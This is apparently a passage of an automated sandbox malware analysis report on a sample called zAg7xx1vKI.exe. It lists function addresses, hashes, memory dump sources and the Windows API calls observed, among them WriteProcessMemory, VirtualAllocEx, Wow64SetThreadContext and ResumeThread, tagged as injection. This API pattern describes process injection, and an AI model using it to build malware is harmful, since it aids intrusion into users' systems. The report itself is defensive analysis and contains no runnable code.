Instruction Fuzzy Hash: 4541F3B1D00B19CFEB24CFA9C884BDDBBB6BF48304F20815AD409AB250DBB55986CF50

Function 00E6449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E659C9

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9bd37db453aab09707e500a1bee6024bf50428ae6276f61c1ea82e80ea73feb6
Instruction ID: bffafc7b8db48bf9e01177a52ef05b01a6dd5c2d33c3e28fd1ca8b9c1f6663dc
Opcode Fuzzy Hash: 9bd37db453aab09707e500a1bee6024bf50428ae6276f61c1ea82e80ea73feb6
Instruction Fuzzy Hash: 1141E371D04B1DDBEB24CFA9C884BDDBBB5BF48704F20815AD409AB251DBB16946CF90

Function 06F1DA90 Relevance: 1.6, APIs: 1, Instructions: 74
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F1DB16

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a7fd150d3eee049b8d41a5dc74d3117776c92cfffc93a772a9294f76b470a4fa
Instruction ID: 0393af34141f86a7810413b1071eb0196a026096e6e01c08fac06709f602d0eb
Opcode Fuzzy Hash: a7fd150d3eee049b8d41a5dc74d3117776c92cfffc93a772a9294f76b470a4fa
Instruction Fuzzy Hash: 1E219C71D043099FDB24CFAAC4817EEBBF4FF49250F14802AD455AB241C778A945CFA0

Function 06F1DC28 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F1DCC0

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ee95abe8226598c0981e8a99ba580dc4235d5987da3a559d9b9f3ecef34ef69c
Instruction ID: 19146a6806659bf2617833ff0687ccfdddc45a87ef8bf28afb9146e59291cf84
Opcode Fuzzy Hash: ee95abe8226598c0981e8a99ba580dc4235d5987da3a559d9b9f3ecef34ef69c
Instruction Fuzzy Hash: 98212A75D003499FDB10DFAAC881BEEBBF5FF48310F108829E959A7240C7789944CBA5

Function 00E6D808 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E6D897

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c7b0067ac6361d3e6b80aa40afc2b330967dd1eb47ccfdb9a4474d0daef543a5
Instruction ID: cb4c891007edf4568abe4d86b1d97f4fab8ee76732c5a4809a00e6ad11a5dcfa
Opcode Fuzzy Hash: c7b0067ac6361d3e6b80aa40afc2b330967dd1eb47ccfdb9a4474d0daef543a5
Instruction Fuzzy Hash: B23146B5D0024A9FDB20CFA9D884BDEBFF4EB49320F28815AE854A7250C374A941CF60

Function 06F1DC30 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F1DCC0

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e159c28d46181b2badae85a5b2d444f68b7d38f34d57f155d7903679abf45856
Instruction ID: c462d06d6d16bc5117491fed2c8b32de676e41977c5e1379606702ab241d0d1b
Opcode Fuzzy Hash: e159c28d46181b2badae85a5b2d444f68b7d38f34d57f155d7903679abf45856
Instruction Fuzzy Hash: 8A213975D003099FDB10CFAAC881BDEBBF5FF48310F108829E959A7240C7789944CBA4

Function 06F1DD18 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F1DDA0

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d6d411cd5ec56f0840b7f27161a494f7c6d3312396af68914323b4c8704b1afc
Instruction ID: d38d733103d8a327c8fceb3c25e0ae0de7b0d0f388eacdf76192cadcb2025969
Opcode Fuzzy Hash: d6d411cd5ec56f0840b7f27161a494f7c6d3312396af68914323b4c8704b1afc
Instruction Fuzzy Hash: A0212871D003599FDB10DFAAC881BEEBBF5FF48310F508429E959A7240CB789945CBA4

Function 06F1DD20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F1DDA0

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e3b22719c8627f32ce1f678bd1472405f94d160fc2cac784f3af4bb72ccd2506
Instruction ID: 2a1484066d000ce2c26175bb0659b74d96b7bb454d09f46e99bc7209d2f7c4f8
Opcode Fuzzy Hash: e3b22719c8627f32ce1f678bd1472405f94d160fc2cac784f3af4bb72ccd2506
Instruction Fuzzy Hash: 442125B1C003599FDB10DFAAC880BEEBBF5FF48310F10842AE959A7240C7789940CBA4

Function 06F1DA98 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F1DB16

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7cbc3bd7dda9f9d29783c38ceca35f7ac1477e946052d10d03210ab26813ab59
Instruction ID: 5197425866550a85f3bca913c99d41dfd8439ecd7686c81f22b3926252359079
Opcode Fuzzy Hash: 7cbc3bd7dda9f9d29783c38ceca35f7ac1477e946052d10d03210ab26813ab59
Instruction Fuzzy Hash: CC213871D003098FDB14DFAAC4857EEBBF5FF48210F148429D459A7241CB78A945CFA4

Function 00E6D810 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E6D897

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9d45072c2615009008dd1b50af89f249b94944d8463c265739d911ea88a021c6
Instruction ID: 95f5128a65b55d46530294f377d855d5c0069801a690fa0c1efba2f5bf7457b4
Opcode Fuzzy Hash: 9d45072c2615009008dd1b50af89f249b94944d8463c265739d911ea88a021c6
Instruction Fuzzy Hash: 0421B0B5D003499FDB10CFAAD984ADEBBF9EB48310F14841AE958A7250D374A944CFA5

Function 06F1DB68 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F1DBDE

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d6930ef89cf2598d0ec7e0662cae36d7230d8f17ba2eca00750f55a0ae88e083
Instruction ID: 93a2550a2a3c6c315d61d098ffb9e92c819bae92232a36e8432095441e2bc158
Opcode Fuzzy Hash: d6930ef89cf2598d0ec7e0662cae36d7230d8f17ba2eca00750f55a0ae88e083
Instruction Fuzzy Hash: 18115976C003099FDB20DFAAC845BDEBBF5EF48310F248419E919A7250CB75A540CBA1

Function 06F1D9E0 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F1DA4A

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6b6f439d6d2d8a192337b06571b51f9be779ab3098b293f0c121e99ebe8ca106
Instruction ID: 7231d66e6dd6bc95dde8e8c858c323de73a060d06c9a56fe110a4415c64861b4
Opcode Fuzzy Hash: 6b6f439d6d2d8a192337b06571b51f9be779ab3098b293f0c121e99ebe8ca106
Instruction Fuzzy Hash: FA114675D043098FDB24DFAAC8457EEBBF5EF88220F248419D419A7240CB756944CBA4

Function 06F1DB70 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F1DBDE

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ea26a10d204f8619914b4ce4141122e0813ce4e49a7585492a4cc8644d4b965c
Instruction ID: 14b0274741e37e78ff712998db5dd2d4c95805551319d3802d1c24735b373734
Opcode Fuzzy Hash: ea26a10d204f8619914b4ce4141122e0813ce4e49a7585492a4cc8644d4b965c
Instruction Fuzzy Hash: E1113776D003499FDB24DFAAC844BDEBBF5EF48320F248419E915A7250CB75A940CFA0

Function 06F1D9E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F1DA4A

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f40de06cb7ded5d753663f7edb3e72da3283f508bb9699f7cf51c5c66c13363f
Instruction ID: 5e81918c2f35edf1c3c8e843c2b685edac2b549bd55965b0414f77ab8fc26c8f
Opcode Fuzzy Hash: f40de06cb7ded5d753663f7edb3e72da3283f508bb9699f7cf51c5c66c13363f
Instruction Fuzzy Hash: 151136B5D043498FDB24DFAAC4457EEFBF5EF88220F248419D419A7240CB79A944CBA4

Function 00E6B118 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E6B17E

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8f3102218ea3f7e491b82b167e425385c9cc89de223498e9aa0a1d22eae295f4
Instruction ID: b4eb7c3aceab146a21756ae6b29e271ac1c39dabe3765b6b90c59590c99e3bf6
Opcode Fuzzy Hash: 8f3102218ea3f7e491b82b167e425385c9cc89de223498e9aa0a1d22eae295f4
Instruction Fuzzy Hash: 8B1102B6C013499FCB20CF9AD444BDEFBF4EB88314F10841AD829A7210C375A545CFA5

Function 00CDD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339063875.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cdd000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 717dfe8317d7d047ff0940a892963f0ec1c1b7333676db12f740324ac8c5d60f
Instruction ID: 8384fc5969a0515889b34b2882e9ace88556e3d3f164d7df29dd805004f8a78b
Opcode Fuzzy Hash: 717dfe8317d7d047ff0940a892963f0ec1c1b7333676db12f740324ac8c5d60f
Instruction Fuzzy Hash: 062128B1904304DFDB15DF10D9C0B26BB65FB94324F24C16EEA0B0B356C336E856CAA2

Function 00DFD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339184890.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dfd000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d87047a2eeb7416695c6fbfbb51ec4b65b4c34679fdaa0c6cca8ba7f028fbd
Instruction ID: 242eca8b08a8c47d25e6605916f0a5e8d51caf77164cfff108d7328d871e1985
Opcode Fuzzy Hash: 50d87047a2eeb7416695c6fbfbb51ec4b65b4c34679fdaa0c6cca8ba7f028fbd
Instruction Fuzzy Hash: 70212571504348DFDB14DF10D480B26BB63EB84314F24C56DEA4A4B286CB36D847CA72

Function 00DFD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339184890.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dfd000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5070d96fcdd539b290e5c0c565380597adabbd66e88205ff5ec5fd80dc23249f
Instruction ID: fca9387a7b1f1437ec3ae2557689fac36e2ccef1e00b4b4e366102ea39d2ace8
Opcode Fuzzy Hash: 5070d96fcdd539b290e5c0c565380597adabbd66e88205ff5ec5fd80dc23249f
Instruction Fuzzy Hash: 6021F2B1504308EFDB05DF10D9C0B26BBA7FB84314F28C56DEA4A4B296C376D846CAB5

Function 00DFD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339184890.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dfd000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37adadbbcb7a8800fedb48eeab7c0ec33e077de1cced71ec0327aecec882c175
Instruction ID: 731898fd4cc333a46edba392d6dc1a291a2f35787295dc89c7f30b868e845c74
Opcode Fuzzy Hash: 37adadbbcb7a8800fedb48eeab7c0ec33e077de1cced71ec0327aecec882c175
Instruction Fuzzy Hash: 09217C755093848FCB12CF20D990715BF72EB46214F29C5EAD9498B6A7C33A980ACB62

Function 00CDD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339063875.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cdd000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: 38e31f3c6b6469a975baebd8c6857081989458f1adfc66a1c527401c5c6dda20
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: 1D110376804240DFCB12CF00D5C0B16BF71FB94324F24C2AAD90A0B756C33AE956CBA1

Function 00DFD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339184890.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dfd000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: 6e87d9f9f893e183ef8963656c27d8a3b28995a1c5128894ee4c2fe9574f1d5f
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: A7119D76504284DFDB16CF10D5C4B25FBB2FB84314F28C6AED9494B696C33AD84ACBA1

Function 00CDD731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339063875.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cdd000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3a7470b2dadad5b4b1aae8c9a8e703bf1f6e6304495cf234fcf7b2af03c8268
Instruction ID: 57c44a7b77b3be1f8348f07e42f20c90e5d50a593a0a88e8d41a1888aaab3f49
Opcode Fuzzy Hash: d3a7470b2dadad5b4b1aae8c9a8e703bf1f6e6304495cf234fcf7b2af03c8268
Instruction Fuzzy Hash: E301AC718043449BE7105A15CDC4766FB98EF41324F24C497EE5B4A386D6759940C671

Function 00CDD730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339063875.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cdd000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58589a3825ed770719758d64153939e611ca25356935b9dfcd90e1ec3715abca
Instruction ID: 8e2f62a16edf50d36be3341ecabc5397495dcc595ce9f58824a84aceda6e87e7
Opcode Fuzzy Hash: 58589a3825ed770719758d64153939e611ca25356935b9dfcd90e1ec3715abca
Instruction Fuzzy Hash: D7F062764043449FE7208A15C9C4B66FB98EB91734F28C59AED594F286C2799C44CAB1

Non-executed Functions

Function 06F1B110 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

gLm, xrefs: 06F1B16B

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: gLm
API String ID: 0-2219830796
Opcode ID: 641383042a872b263b24d8d36005730059ee5add6a80e358a9b7fd7c0bedf81d
Instruction ID: f30bc80bca565e8d71f755505b98f50ef9e7f7028330784dc75c15d9e96869eb
Opcode Fuzzy Hash: 641383042a872b263b24d8d36005730059ee5add6a80e358a9b7fd7c0bedf81d
Instruction Fuzzy Hash: D5E1F774E00259CFDB14DFA9C580AAEFBB2FF89304F248169E414AB359D735A942CF61

Function 06F1C950 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

)Rt, xrefs: 06F1C9AB

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: )Rt
API String ID: 0-725820936
Opcode ID: 70bd260cca77914c84f4d0f2d1a0c0552bb05e34bad8c40a634f4ffcc82b2649
Instruction ID: ca2a7df49ae1fe3a3a21635513c29d9df70358a3eb17097428ffac114a622d20
Opcode Fuzzy Hash: 70bd260cca77914c84f4d0f2d1a0c0552bb05e34bad8c40a634f4ffcc82b2649
Instruction Fuzzy Hash: 81E10974E002598FDB54DFA9C580AAEFBB2FF89304F248169D414AB359D735AD42CFA0

Function 06F1B548 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 301c0826183892c3f1235d2d1eeabcd27b14b33c3b20f94a5f905931a03ef479
Instruction ID: 67f4ce4065ccabadb592c29be487b1aaf48266b367b1713926dbfc1601d642f4
Opcode Fuzzy Hash: 301c0826183892c3f1235d2d1eeabcd27b14b33c3b20f94a5f905931a03ef479
Instruction Fuzzy Hash: 05E1FC74E00259CFDB14DFA9C580AAEFBB2FF89304F248169D454AB359D735A942CF60

Function 06F1D1C0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0efafa208ea6deacf3562c8824e7ce03e48d780f6220ed129b9478ac55f0264f
Instruction ID: fa909d7305ad507e8d01ace48c3ce680dce36b5c23d57998408f6da4759b66cd
Opcode Fuzzy Hash: 0efafa208ea6deacf3562c8824e7ce03e48d780f6220ed129b9478ac55f0264f
Instruction Fuzzy Hash: 4CE10874E002598FDB14DFA9C580AAEFBB2FF89304F248169D414AB359D735AD42CF61

Function 06F1CD88 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2b7714fcc03f7d0a14796857b2564e8b2136ea87c75ebebdb849acacbc1df7
Instruction ID: d718da671660e9f2cda0c42e584a4682323334b8e06b2427d7de0c1d5d52978a
Opcode Fuzzy Hash: 3b2b7714fcc03f7d0a14796857b2564e8b2136ea87c75ebebdb849acacbc1df7
Instruction Fuzzy Hash: 78E1FB74E002598FDB14DFA9C580AAEFBF2FF89304F248169D414AB359D735A942CFA1

Function 00E6D584 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0588e855ad2ddb28993b3f065a05520f1c5ffd632ee570ab156ed7b71df363dd
Instruction ID: c8b85e58e3ad20cf270ae1fefec70b4728692af1c8bafac1ba2b305b7d7de10c
Opcode Fuzzy Hash: 0588e855ad2ddb28993b3f065a05520f1c5ffd632ee570ab156ed7b71df363dd
Instruction Fuzzy Hash: D5A17A32E402098FCF19DFA4E85059EB7F2FF85344B24917AE801BB266DB31E946CB40

Function 06F1CD78 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd1549f8ccc52693e600a7627aea05a33d95e9299f5acdf5a8fa8e6e86cfd61
Instruction ID: b4814b73622dc74b160c8150c7803c1c7e4e6812733ec56df89ba67de4db2ad6
Opcode Fuzzy Hash: 4bd1549f8ccc52693e600a7627aea05a33d95e9299f5acdf5a8fa8e6e86cfd61
Instruction Fuzzy Hash: 2F512D74E002598FDB14DFA9C9815AEFBF2FF89304F24816AD418AB315D7359A41CFA1

Analysis Process: zAg7xx1vKI.exePID: 2112, Parent PID: 1100COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	8.3%
Total number of Nodes:	133
Total number of Limit Nodes:	10

Executed Functions

Function 00417E43 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795

Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57

Memory Dump Source

Source File: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_zAg7xx1vKI.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4

Function 010C2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010C2B6A

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
Instruction ID: 9f5ff3559bc62bf12fa0474e16ba2f0976d70ae8b59dd015d69280f4fee66b9d
Opcode Fuzzy Hash: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
Instruction Fuzzy Hash: 58900265202510035105715C8414616401A97E0201B55C022E1414590DC52589916226

Function 010C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010C2DFA

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
Instruction ID: acf2c8d1e2d96960b681eea5ca5cacdb14cebf6deb33b413c6205ea3aba0a92b
Opcode Fuzzy Hash: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
